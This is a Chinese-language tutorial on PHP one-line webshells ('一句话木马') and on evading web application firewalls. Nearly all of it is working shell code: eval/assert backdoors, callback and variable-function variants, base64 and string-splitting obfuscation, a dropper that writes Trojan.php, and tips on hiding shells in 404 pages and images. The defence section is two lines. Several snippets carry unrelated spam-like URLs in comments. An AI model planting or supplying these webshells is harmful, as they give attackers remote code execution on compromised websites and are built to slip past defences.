如何让一句话木马绕过waf ?

一、什么是一句话木马？

一句话木马就是只需要一行代码的木马，短短一行代码，就能做到和大马相当的功能。为了绕过waf的检测，一句话木马出现了无数中变形，但本质是不变的：木马的函数执行了我们发送的命令。

二、我们如何发送命令，发送的命令如何执行？

我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据，一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据，并把接收的数据传递给一句话木马中执行命令的函数，进而执行命令。 所以看到的经典一句话木马大多都是只有两个部分，一个是可以执行代码的函数部分，一个是接收数据的部分。

0.eval函数

<?php eval($_POST['a']) ?>

其中eval就是执行命令的函数，**$_POST['a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。

因为木马是接收post请求中 “a” 的数据（ $_POST['a’]）,所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。如果把木马中的post替换成get，那么我么就需要以GET方法发送“a”，

使用 其他函数制作一句话木马

1.assert函数

<?php assert(@$_POST['a']); ?>

2.create_function函数

<?php

// https://www.bz80.vip

$fun = create_function('',$_POST['a']);

$fun();

?>

把用户传递的数据生成一个函数fun()，然后再执行fun()

3. call_user_func回调函数

<?php

// https://www.bz80.com

@call_user_func(assert,$_POST['a']);

?>

call_user_func这个函数可以调用其它函数，被调用的函数是call_user_func的第一个函数，被调用的函数的参数是call_user_func的第二个参数。

这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。

4.preg_replace函数

<?php

// https://www.woailunwen.com

@preg_replace("/abcde/e", $_POST['a'], "abcdefg");

?>

这个函数原本是利用正则表达式替换符合条件的字符串，但是这个函数有一个功能——可执行命令。

这个函数的第一个参数是正则表达式，按照PHP的格式，表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”，那么这个函数的第二个参数就会被当作代码执行。

5. file_put_contents函数

利用函数生成木马

<?php

// https://www.2017549.com

$test='<?php $a=$_POST["cmd"];assert($a); ?>';

file_put_contents("Trojan.php", $test);

?>

函数功能：生成一个文件，第一个参数是文件名，第二个参数是文件的内容。

6.array数组

<?php

// https://www.sanweie.com

$a='assert';

array_map("$a",$_REQUEST);

?>

上述定义参数a并赋值'assert’,利用array_map()函数将执行语句进行拼接。最终实现assert（$_REQUEST）。

<?php

$item['JON']='assert';

$array[]=$item;

$array[0]['JON']($_POST["TEST"]);

?>

利用函数的组合效果，使得多个参数在传递后组合成一段命令并执行。

7.PHP变量函数

<?php

$a = "eval";

$a(@$_POST['a']);

?>

第三行使用了变量函数$a，变量储存了函数名eval，便可以直接用变量替代函数名。

三、如何让一句话木马绕过waf ?

waf是网站的防火墙，例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马，但是一句话木马的变形有很多种，waf根本不可能全部拦截。想要绕过waf，需要掌握各种PHP小技巧，掌握的技巧多了，把技巧结合起来，设计出属于自己的一句话木马。

2.PHP可变变量

<?php

$bb="eval";

$aa="bb";

$$aa($_POST['a']);

?>

看这句就能理解上述语句：$$aa = ( ((aa) = $ ('bb’) = $bb = “eval”

3.str_replace函数

<?php

$a=str_replace("Waldo", "", "eWaldoval");

$a(@$_POST['a']);

?>

函数功能：在第三个参数中，查找第一个参数，并替换成第二个参数。这里第二个参数为空字符串，就相当于删除"Waldo"。

4. base64_decode函数

<?php

$a=base64_decode("ZXZhbA==")

$a($_POST['a']);

?>

这里是base64解密函数，"ZXZhbA=="是eval的base64加密。

5."."操作符

<?php

$a="e"."v";

$b="a"."l";

$c=$a.$b;

$c($_POST['a']);

?>

6.parse_str函数

<?php

// https://www.ning8.cn

$str="a=eval";

parse_str($str);

$a($_POST['a']);

?>

执行这个函数后，生成一个变量$a，值为字符串"eval"

7.更换数据来源

7.1GET篇

<?php $_GET[a]($_GET[b]);  ?>

<?php @eval( $_GET[$_GET[b]])>

利用方法:

b=cmd&cmd=phpinfo()

7.2利用script代替<? 、?>标签

<script language="php">@eval_r($_GET[b])</script>

7.3利用session

8.字符替换或特殊编码

9.木马藏匿

1.404页面

2.图片木马，用文件包含调用

四、总结

绕过技巧：

更换执行数据来源

字符替换或者编码

采取隐匿手段

tips:使用一句话木马的时候可以在函数前加”@”符，这个符号让php语句不显示错误信息，增加隐蔽性。

五、防御

1.禁用assert()函数，监控eval()

2.搜索日志的assert。

亦可能绕过：

<?php

// https://www.bang4.cn

$c=$_GET[n].'t';

@$c($_POST[cmd]);

?>

<?php

// https://www.ning9.com

$c=base64_decode('YXNzZXI=').$_GET[n].'t';

@$c($_POST[cmd]);

?>